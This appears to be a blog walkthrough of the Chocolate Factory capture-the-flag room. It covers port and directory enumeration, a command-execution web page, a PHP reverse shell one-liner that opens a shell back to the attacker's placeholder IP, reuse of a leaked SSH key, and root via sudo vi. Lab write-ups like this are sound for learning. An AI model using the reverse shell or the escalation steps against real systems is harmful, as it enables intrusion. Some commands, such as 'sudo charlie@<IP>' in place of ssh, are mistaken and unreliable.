In this post, i would like to share a walkthrough of the Chocolate Factory Room.

This room is been considered difficulty rated as LOW machine

Let’s Start!

We need to deploy the machine for us to play with the machine

Once the machine is fully up within 5 minutes, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN

Information Gathering on Chocolate Factory

There are multiple ports that have been open but the crucial port that caught my attention

  • 21: csftpd 3.0.2
  • 22: OpenSSH 7.6p1
  • 80: Apache httpd 2.6.29

Let’s check what is stored inside the website.

Let’s start to enumerate the website by executing the command dirb <IP Address> /usr/share/wordlist/common.txt -X .php,.html, and hope that we found something useful.

We did find something useful which is the home.php directory

The page shows the area of the search column where you can key-in any command and EXECUTE button.

Let’s try out any command that works for Linux

The command below is uname -a

Let’s see what has been stored inside the server. Oh wow! I notice that key_rev_key

Let’s try to download the file by accessing the location in the browser as shown below

Sadly, it’s hard to read the file but i notice the key appears in the middle of the code.

It’s very hard for us to command via the browser. Let’s upload a shell so that we can access it using the terminal.

The shell that we can use in this situation such as follows:

php -r '$sock=fsockopen("ip-address",port);exec("/bin/sh -i <&3 >&3 2>&3");'
* Replace the IP-address with your own IP and own port

For this activity, i use 1234 as my port

Let’s read the user.txt file at /home/charlie directory

However, we cannot read the file because the permission is denied. Let’s see what is written in the teleport file by using the cat teleport

We need to copy-paste everything on the teleport and create the id_rsa on our machine.

For us to get access via ssh by running the command below

sudo charlie@<IP Address> -i id_rsa

SSH Access to the machine

Now, we can read the user.txt by using the charlie credentials

Got It! Now, we need to focus on root privileges access

Let’s run the command sudo -l

I notice that /usr/bin/vi can be used for us to gain root privileges access.

We can execute :!/bin/sh and press enter. We have successfully gained root access.

I don’t find root.txt but we found on /root/ directory

Let’s run the by executing with python. The key that we need to enter is the same key as the first questions on the challenges!

While we are using root privileges access, let’s find charlie password by going to /var/www/html directory

We need to read validate.php in order to retrieve charlie’s password


Happy Learning Guys!